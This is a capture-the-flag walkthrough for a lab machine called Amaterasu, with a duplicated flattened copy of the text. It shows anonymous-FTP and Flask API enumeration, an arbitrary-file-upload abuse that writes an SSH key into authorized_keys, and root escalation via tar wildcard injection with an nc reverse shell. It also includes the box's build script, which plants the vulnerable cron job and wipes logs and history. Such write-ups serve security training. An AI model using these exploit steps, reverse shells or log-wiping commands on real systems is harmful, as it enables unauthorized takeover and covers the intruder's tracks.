Amaterasu

nmap

nmap -p21,25022,33414,40080 -sV -sC -T4 -Pn -oA 192.168.152.249-nmap 192.168.152.249               
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-10 01:23 +08
Nmap scan report for 192.168.152.249
Host is up (0.24s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.230
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
25022/tcp open  ssh     OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 68c605e8dcf29a2a789beea1aef6381a (ECDSA)
|_  256 e989ccc21714f3bc6221064a5e7180ce (ED25519)
33414/tcp open  unknown
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/2.2.3 Python/3.9.13
|     Date: Tue, 09 Jan 2024 17:23:47 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   Help: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('HELP').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|     </html>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
40080/tcp open  http    Apache httpd 2.4.53 ((Fedora))
|_http-server-header: Apache/2.4.53 (Fedora)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: My test page
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33414-TCP:V=7.93%I=7%D=1/10%Time=659D8124%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,184,"HTTP/1\.1\x20404\x20NOT\x20FOUND\r\nServer:\x20Werkzeug/
SF:2\.2\.3\x20Python/3\.9\.13\r\nDate:\x20Tue,\x2009\x20Jan\x202024\x2017:
SF:23:47\x20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent
SF:-Length:\x20207\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<htm
SF:l\x20lang=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1
SF:>\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20se
SF:rver\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20c
SF:heck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(HTTPOptions
SF:,184,"HTTP/1\.1\x20404\x20NOT\x20FOUND\r\nServer:\x20Werkzeug/2\.2\.3\x
SF:20Python/3\.9\.13\r\nDate:\x20Tue,\x2009\x20Jan\x202024\x2017:23:47\x20
SF:GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\
SF:x20207\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<html\x20lang
SF:=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>The
SF:\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\x2
SF:0If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x20y
SF:our\x20spelling\x20and\x20try\x20again\.</p>\n")%r(RTSPRequest,1F4,"<!D
SF:OCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\"
SF:>\n<html>\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\"
SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x
SF:20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20<h1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>
SF:Error\x20code:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\
SF:x20Bad\x20request\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQ
SF:UEST\x20-\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.<
SF:/p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(Help,1EF,"<!DOCTYPE\x20HTML
SF:\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x2
SF:0\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equi
SF:v=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20
SF:</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Er
SF:ror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:
SF:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20requ
SF:est\x20syntax\x20\('HELP'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>E
SF:rror\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20
SF:request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x2
SF:0</body>\n</html>\n");
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.23 seconds

port 21 can login as anonymous but cannot run any command

21/tcp    open  ftp     vsftpd 3.0.3
25022/tcp open  ssh     OpenSSH 8.6 (protocol 2.0)
33414/tcp open  unknown
 HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/2.2.3 Python/3.9.13
40080/tcp open  http    Apache httpd 2.4.53 ((Fedora))

dirb

/help	
0	"GET /info : General Info"
1	"GET /help : This listing"
2	"GET /file-list?dir=/tmp : List of the files"
3	"POST /file-upload : Upload files"

/info
0	"Python File Server REST API v2.5"
1	"Author: Alfredo Moroder"
2	"GET /help = List of the commands"

user located

192.168.224.249:33414/file-list?dir=/home/

alfredo

file upload post request

curl -F file="@letmein.txt" -F filename="/home/alfredo/.ssh/authorized_keys" -X POST -H "Content-Type: multipart/form-data" 'http://192.168.152.249:33414/file-upload' -x 127.0.0.1:8080

{"message":"File successfully uploaded"}

Note : letmein.txt contain ur ssh generated public key

ssh alfredo@192.168.152.249 -p 25022 -i /home/kali/letmein

.bash_history

app.py

from flask import Flask

UPLOAD_FOLDER = '/tmp'

app = Flask(__name__)
#app.secret_key = "secret key"
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024

file-upload.py (main.py)

import os
import urllib.request
from app import app
from flask import Flask, request, redirect, jsonify
from werkzeug.utils import secure_filename

ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
UPLOAD_DIRECTORY = '/'

def allowed_file(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS

@app.route('/info', methods=['GET'])
def show_info():
    """Endpoint to list files on the server."""
    info = []

    info.append('Python File Server REST API v2.5')
    info.append('Author: Alfredo Moroder')
    info.append('GET /help = List of the commands')
    return jsonify(info)

@app.route('/help', methods=['GET'])
def show_help():
    """Endpoint to list files on the server."""
    info = []

    info.append('GET /info : General Info')
    info.append('GET /help : This listing')
    info.append('GET /file-list?dir=/tmp : List of the files')
    info.append('POST /file-upload : Upload files')
    return jsonify(info)

@app.route('/file-list', methods=['GET'])
def list_files():
    """Endpoint to list files on the server."""
    folder = ""
    if len(request.args.get("dir")) == 0:
        folder = "/tmp"
    else:
        folder = request.args.get("dir")

    files = []
    for filename in os.listdir(folder):
        path = os.path.join(folder, filename)
        files.append(filename)

    return jsonify(files)

@app.route('/file-upload', methods=['POST'])
def upload_file():
    # check if the post request has the file part
    if 'file' not in request.files:
        resp = jsonify({'message' : 'No file part in the request'})
        resp.status_code = 400
        return resp
    if 'filename' not in request.form:
        resp = jsonify({'message' : 'No filename part in the request'})
        resp.status_code = 400
        return resp

    file = request.files['file']
    filename = request.form['filename']
    if file.filename == '':
        resp = jsonify({'message' : 'No file selected for uploading'})
        resp.status_code = 400
        return resp
    if file and allowed_file(file.filename):
        file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        resp = jsonify({'message' : 'File successfully uploaded'})
        resp.status_code = 201
        return resp
    else:
        resp = jsonify({'message' : 'Allowed file types are txt, pdf, png, jpg, jpeg, gif'})
        resp.status_code = 400
        return resp

if __name__ == "__main__":
    app.run(host='0.0.0.0',port='33414')

Priv Esc

[alfredo@fedora opt]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/1 * * * * root /usr/local/bin/backup-flask.sh

Reading the file

[alfredo@fedora opt]$ ls -l /usr/local/bin/backup-flask.sh
-rwxr-xr-x. 1 root root 106 Mar 28  2023 /usr/local/bin/backup-flask.sh

[alfredo@fedora opt]$ cat /usr/local/bin/backup-flask.sh
#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *

tar is using * wildcard

pivot to root

cd /home/alfredo/restapi
nano exex.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.158 443 >/tmp/f
echo "" > "--checkpoint-action=exec=sh exex.sh"
echo "" > --checkpoint=1

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.146.158 4455 >/tmp/f" > exex.sh

run.sh

#!/usr/bin/env bash
set -e
cd /root

cat << 'EOT' > /etc/systemd/system/pythonflask.service
[Unit]
Description=PythonFlask
After=network-online.target

[Service]
Type=simple
PIDFile=/run/pythonflask.pid
ExecStart=/usr/bin/python3 /home/alfredo/restapi/main.py
User=alfredo
Group=alfredo
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure

[Install]
WantedBy=multi-user.target
EOT
systemctl daemon-reload
systemctl enable pythonflask
systemctl start pythonflask

# -----------------

# Priv esc vuln

base64 -d << 'EOT' > /usr/local/bin/backup-flask.sh
IyEvYmluL3NoCmV4cG9ydCBQQVRIPSIvaG9tZS9hbGZyZWRvL3Jlc3RhcGk6JFBBVEgiCmNkIC9o
b21lL2FsZnJlZG8vcmVzdGFwaQp0YXIgY3pmIC90bXAvZmxhc2sudGFyLmd6ICoKCg==
EOT
echo "*/5 * * * * root /usr/local/bin/backup-flask.sh" >> /etc/crontab 
chmod +x /usr/local/bin/backup-flask.sh

# -----------------

# Decoys
yum -y install vsftpd
cat << 'EOT' > /etc/vsftpd/vsftpd.conf
listen=YES
anonymous_enable=YES
write_enable=NO
anon_upload_enable=NO
anon_mkdir_write_enable=NO
EOT
cd /var/ftp/pub
git clone https://github.com/Azure-Samples/cognitive-services-REST-api-samples cognitive
cd cognitive
rm -rf .git
systemctl enable vsftpd
systemctl start vsftpd
# ----
cd /var/www/html
git clone https://github.com/mdn/beginner-html-site-styled . 
rm -rf .git/
rm -f *.md
sed -i "s/Listen 80/Listen 40080/g" /etc/httpd/conf/httpd.conf
systemctl enable httpd
systemctl start httpd 

# =====================
# END Building AMATERASU


# Firwall
yum -y install iptables-services
systemctl enable iptables

iptables -X
iptables -F
iptables -I INPUT 1 -i lo -j ACCEPT
iptables -A INPUT -m conntrack --ctstate NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 21 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 25022 -j ACCEPT
iptables -A INPUT -p tcp --dport 33414 -j ACCEPT
iptables -A INPUT -p tcp --dport 40080 -j ACCEPT
iptables -A INPUT -p tcp --dport 139 -j ACCEPT
iptables -A INPUT -p tcp --dport 111 -j ACCEPT
iptables -A INPUT -p tcp --dport 2049 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 445 -j ACCEPT
iptables -A INPUT -p tcp --dport 10000 -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -p icmp --icmp-type echo-reply -j ACCEPT
iptables -A INPUT -j DROP

iptables -A OUTPUT -o lo -j ACCEPT
iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 25022 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 25022 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 40080 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 40080 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 33414 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 33414 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 139 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 139 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 111 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 111 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 445 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 445 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 2049 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 2049 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --dport 10000 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p tcp --sport 10000 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT
iptables -A OUTPUT -j DROP

iptables-save > /etc/sysconfig/iptables

# Cleaning up
find /var/log -type f -exec sh -c "cat /dev/null > {}" \;
rm -rf /tmp/* 
rm -rf /root/.cache
cat /dev/null > /root/.bash_history && history -c && shutdown now

PreviousPG Play NextLinux

Last updated 1 year ago

nmap -p21,25022,33414,40080 -sV -sC -T4 -Pn -oA 192.168.152.249-nmap 192.168.152.249 Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-10 01:23 +08 Nmap scan report for 192.168.152.249 Host is up (0.24s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.230 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 25022/tcp open ssh OpenSSH 8.6 (protocol 2.0) | ssh-hostkey: | 256 68c605e8dcf29a2a789beea1aef6381a (ECDSA) |_ 256 e989ccc21714f3bc6221064a5e7180ce (ED25519) 33414/tcp open unknown | fingerprint-strings: | GetRequest, HTTPOptions: | HTTP/1.1 404 NOT FOUND | Server: Werkzeug/2.2.3 Python/3.9.13 | Date: Tue, 09 Jan 2024 17:23:47 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 207 | Connection: close | <!doctype html> | <html lang=en> | <title>404 Not Found</title> | <h1>Not Found</h1> | <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p> | Help: | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 400</p> | <p>Message: Bad request syntax ('HELP').</p> | <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p> | </body> | </html> | RTSPRequest: | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 400</p> | <p>Message: Bad request version ('RTSP/1.0').</p> | <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p> | </body> |_ </html> 40080/tcp open http Apache httpd 2.4.53 ((Fedora)) |_http-server-header: Apache/2.4.53 (Fedora) | http-methods: |_ Potentially risky methods: TRACE |_http-title: My test page 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port33414-TCP:V=7.93%I=7%D=1/10%Time=659D8124%P=x86_64-pc-linux-gnu%r(G SF:etRequest,184,"HTTP/1\.1\x20404\x20NOT\x20FOUND\r\nServer:\x20Werkzeug/ SF:2\.2\.3\x20Python/3\.9\.13\r\nDate:\x20Tue,\x2009\x20Jan\x202024\x2017: SF:23:47\x20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent SF:-Length:\x20207\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<htm SF:l\x20lang=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1 SF:>\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20se SF:rver\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20c SF:heck\x20your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(HTTPOptions SF:,184,"HTTP/1\.1\x20404\x20NOT\x20FOUND\r\nServer:\x20Werkzeug/2\.2\.3\x SF:20Python/3\.9\.13\r\nDate:\x20Tue,\x2009\x20Jan\x202024\x2017:23:47\x20 SF:GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\ SF:x20207\r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<html\x20lang SF:=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>The SF:\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\x2 SF:0If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x20y SF:our\x20spelling\x20and\x20try\x20again\.</p>\n")%r(RTSPRequest,1F4,"<!D SF:OCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\ SF:x20\x20\x20\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\" SF:>\n<html>\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<met SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\" SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x SF:20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20 SF:\x20\x20<h1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p> SF:Error\x20code:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\ SF:x20Bad\x20request\x20version\x20$'RTSP/1\.0'$\.</p>\n\x20\x20\x20\x20 SF:\x20\x20\x20\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQ SF:UEST\x20-\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.< SF:/p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(Help,1EF,"<!DOCTYPE\x20HTML SF:\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x2 SF:0\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equi SF:v=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x2 SF:0\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20 SF:</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Er SF:ror\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code: SF:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20requ SF:est\x20syntax\x20$'HELP'$\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>E SF:rror\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20 SF:request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x2 SF:0</body>\n</html>\n"); Service Info: OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 130.23 seconds

21/tcp open ftp vsftpd 3.0.3 25022/tcp open ssh OpenSSH 8.6 (protocol 2.0) 33414/tcp open unknown HTTP/1.1 404 NOT FOUND | Server: Werkzeug/2.2.3 Python/3.9.13 40080/tcp open http Apache httpd 2.4.53 ((Fedora))

/help 0 "GET /info : General Info" 1 "GET /help : This listing" 2 "GET /file-list?dir=/tmp : List of the files" 3 "POST /file-upload : Upload files" /info 0 "Python File Server REST API v2.5" 1 "Author: Alfredo Moroder" 2 "GET /help = List of the commands"

curl -F file="@letmein.txt" -F filename="/home/alfredo/.ssh/authorized_keys" -X POST -H "Content-Type: multipart/form-data" 'http://192.168.152.249:33414/file-upload' -x 127.0.0.1:8080 {"message":"File successfully uploaded"}

import os import urllib.request from app import app from flask import Flask, request, redirect, jsonify from werkzeug.utils import secure_filename ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif']) UPLOAD_DIRECTORY = '/' def allowed_file(filename): return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS @app.route('/info', methods=['GET']) def show_info(): """Endpoint to list files on the server.""" info = [] info.append('Python File Server REST API v2.5') info.append('Author: Alfredo Moroder') info.append('GET /help = List of the commands') return jsonify(info) @app.route('/help', methods=['GET']) def show_help(): """Endpoint to list files on the server.""" info = [] info.append('GET /info : General Info') info.append('GET /help : This listing') info.append('GET /file-list?dir=/tmp : List of the files') info.append('POST /file-upload : Upload files') return jsonify(info) @app.route('/file-list', methods=['GET']) def list_files(): """Endpoint to list files on the server.""" folder = "" if len(request.args.get("dir")) == 0: folder = "/tmp" else: folder = request.args.get("dir") files = [] for filename in os.listdir(folder): path = os.path.join(folder, filename) files.append(filename) return jsonify(files) @app.route('/file-upload', methods=['POST']) def upload_file(): # check if the post request has the file part if 'file' not in request.files: resp = jsonify({'message' : 'No file part in the request'}) resp.status_code = 400 return resp if 'filename' not in request.form: resp = jsonify({'message' : 'No filename part in the request'}) resp.status_code = 400 return resp file = request.files['file'] filename = request.form['filename'] if file.filename == '': resp = jsonify({'message' : 'No file selected for uploading'}) resp.status_code = 400 return resp if file and allowed_file(file.filename): file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) resp = jsonify({'message' : 'File successfully uploaded'}) resp.status_code = 201 return resp else: resp = jsonify({'message' : 'Allowed file types are txt, pdf, png, jpg, jpeg, gif'}) resp.status_code = 400 return resp if __name__ == "__main__": app.run(host='0.0.0.0',port='33414')

[alfredo@fedora opt]$ cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed */1 * * * * root /usr/local/bin/backup-flask.sh

[alfredo@fedora opt]$ ls -l /usr/local/bin/backup-flask.sh -rwxr-xr-x. 1 root root 106 Mar 28 2023 /usr/local/bin/backup-flask.sh [alfredo@fedora opt]$ cat /usr/local/bin/backup-flask.sh #!/bin/sh export PATH="/home/alfredo/restapi:$PATH" cd /home/alfredo/restapi tar czf /tmp/flask.tar.gz *

cd /home/alfredo/restapi nano exex.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.158 443 >/tmp/f echo "" > "--checkpoint-action=exec=sh exex.sh" echo "" > --checkpoint=1 echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.146.158 4455 >/tmp/f" > exex.sh

#!/usr/bin/env bash set -e cd /root cat << 'EOT' > /etc/systemd/system/pythonflask.service [Unit] Description=PythonFlask After=network-online.target [Service] Type=simple PIDFile=/run/pythonflask.pid ExecStart=/usr/bin/python3 /home/alfredo/restapi/main.py User=alfredo Group=alfredo ExecReload=/bin/kill -USR1 $MAINPID Restart=on-failure [Install] WantedBy=multi-user.target EOT systemctl daemon-reload systemctl enable pythonflask systemctl start pythonflask # ----------------- # Priv esc vuln base64 -d << 'EOT' > /usr/local/bin/backup-flask.sh IyEvYmluL3NoCmV4cG9ydCBQQVRIPSIvaG9tZS9hbGZyZWRvL3Jlc3RhcGk6JFBBVEgiCmNkIC9o b21lL2FsZnJlZG8vcmVzdGFwaQp0YXIgY3pmIC90bXAvZmxhc2sudGFyLmd6ICoKCg== EOT echo "*/5 * * * * root /usr/local/bin/backup-flask.sh" >> /etc/crontab chmod +x /usr/local/bin/backup-flask.sh # ----------------- # Decoys yum -y install vsftpd cat << 'EOT' > /etc/vsftpd/vsftpd.conf listen=YES anonymous_enable=YES write_enable=NO anon_upload_enable=NO anon_mkdir_write_enable=NO EOT cd /var/ftp/pub git clone https://github.com/Azure-Samples/cognitive-services-REST-api-samples cognitive cd cognitive rm -rf .git systemctl enable vsftpd systemctl start vsftpd # ---- cd /var/www/html git clone https://github.com/mdn/beginner-html-site-styled . rm -rf .git/ rm -f *.md sed -i "s/Listen 80/Listen 40080/g" /etc/httpd/conf/httpd.conf systemctl enable httpd systemctl start httpd # ===================== # END Building AMATERASU # Firwall yum -y install iptables-services systemctl enable iptables iptables -X iptables -F iptables -I INPUT 1 -i lo -j ACCEPT iptables -A INPUT -m conntrack --ctstate NEW,ESTABLISHED,RELATED -j ACCEPT iptables -A INPUT -p tcp --dport 21 -j ACCEPT iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A INPUT -p tcp --dport 25022 -j ACCEPT iptables -A INPUT -p tcp --dport 33414 -j ACCEPT iptables -A INPUT -p tcp --dport 40080 -j ACCEPT iptables -A INPUT -p tcp --dport 139 -j ACCEPT iptables -A INPUT -p tcp --dport 111 -j ACCEPT iptables -A INPUT -p tcp --dport 2049 -j ACCEPT iptables -A INPUT -p tcp --dport 443 -j ACCEPT iptables -A INPUT -p tcp --dport 445 -j ACCEPT iptables -A INPUT -p tcp --dport 10000 -j ACCEPT iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT iptables -A INPUT -p icmp 